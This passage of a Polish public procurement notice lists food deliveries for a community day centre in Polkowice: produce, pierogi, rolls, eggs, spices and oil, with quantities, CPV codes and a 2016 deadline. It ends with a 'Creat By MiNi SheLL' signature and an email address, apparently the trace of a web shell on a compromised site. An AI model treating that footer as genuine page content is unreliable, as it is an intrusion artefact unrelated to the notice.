2	Cytryna dojrzała, nienadmarznięta, bez uszkodzeń mechanicznych	kg	3
3	Czosnek dojrzały, główka, nienadmarznięty, bez uszkodzeń mechanicznych	Szt.	4
4	Jabłka dojrzałe, nienadmarznięte, bez uszkodzeń mechanicznych	kg	20
5	Koper nać pakowany  w pęczek dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	szt	3
6	Kukurydza konserwowa op. 400 g  bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia,  bez dodatku cukrów i substancji słodzących  zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej  zawartości  sodu	szt.	3
7	Mandarynka dojrzała, nienadmarznięta, bez uszkodzeń mechanicznych	kg	15
8	Marmolada wieloowocowa o konsystencji twardej, op. 500g , pakowana w wiaderku, bez uszkodzeń mechanicznych, dobrej jakości	kg	2
9	Ogórek kons. z cukrem, op. 500g, bez uszkodzeń mechanicznych	szt.	3
10	Ogórek zielony, dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	kg	4
11	Papryka świeża, nienadmarznięta, bez uszkodzeń mechanicznych	kg	3
12	Pieczarki dojrzałe, nienadmarznięte, bez uszkodzeń mechanicznych	kg	2
13	Pietruszka zielona natka,  w pęczku, dojrzała, nienadmarznięty, bez uszkodzeń mechanicznych	Szt.	3
14	Pomarańcza dojrzała, nienadmarznięta, bez uszkodzeń mechanicznych	kg	20
15	Pomidor dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	kg	5
16	Sałata lodowa, nienadmarznięta, bez uszkodzeń mechanicznych	szt	15
17	Sałata świeża, nienadmarznięta, bez uszkodzeń mechanicznych	szt	5
18	Szczypior dojrzały, pęczek, nienadmarznięty, bez uszkodzeń mechanicznych	szt	5
19	Truskawki świeże-sezon dojrzałe, nienadmarznięte, bez uszkodzeń mechanicznych	kg	5
20	Ziemniaki pakowane   dojrzałe, nienadmarznięty, bez uszkodzeń mechanicznych, I gat.	kg	30
			
21			
	Winogron - sezon dojrzały, nienadmarznięty, bez uszkodzeń mechanicznych	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-GOTOWE PRODUKTY MĄCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-GOTOWE PRODUKTY MĄCZNE 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Pierogi z kapustą i pieczarkami, nie mrożone, min. zawartość kapusty i pieczarek 50%, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia. 	kg	10
2	Uszka z grzybami, nie mrożone, min. zawartość grzybów 50%, bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia. 	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PIECZYWO, ŚWIEŻE PRODUKTY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PIECZYWO, ŚWIEŻE PRODUKTY PIEKARSKIE I CIASTKARSKIE 
Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1.	Bułki słodkie z mąki pszennej 125g. (z różnym nadzieniem)	szt.	10350
			
2. 	Bułki słodkie z mąki pszennej 125g. (z różnym nadzieniem)	szt. 	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-JAJKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-JAJKA

Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1.	Jajka klasy L, wyraźnie oznakowany termin przydatności do spożycia, specyfikacja pochodzenia, atest, świeże, dobrej jakości.	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach-PRZYPRAWY


Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1	Bazylia 10 g , bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia.	Szt.	4
2	Cynamon 15g ,bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia.	Szt.	5
3	Kwasek cytrynowy 20g, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	Szt.	5
4	Oregano, 10 g ,bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	Szt.	5
5	Papryka mielona, słodka, 20g, bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia.	Szt.	5
6	Pieprz mielony czarny  op. 20g. ,bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	Szt.	5
7	Pieprz ziołowy op. 20 g., bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	Szt.	3
8	Zioła prowansalskie 10 g, bez zawartości glutaminianu sodu, bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	Szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach - OLEJE I MARGARYNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa Artykułów żywnościowych do Świetlicy Środowiskowej Ośrodka Pomocy Społecznej w Polkowicach 

OLEJE I MARGARYNY

Lp.	Nazwa produktu spożywczego	Jednostka miary	Ilość
1	2	3	4
1.	Olej rzepakowy 1l,rafinowany o zawartości kwasów jednonienasyconych powyżej 65% i zawartości kwasów wielonienasyconych poniżej 40%,  bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com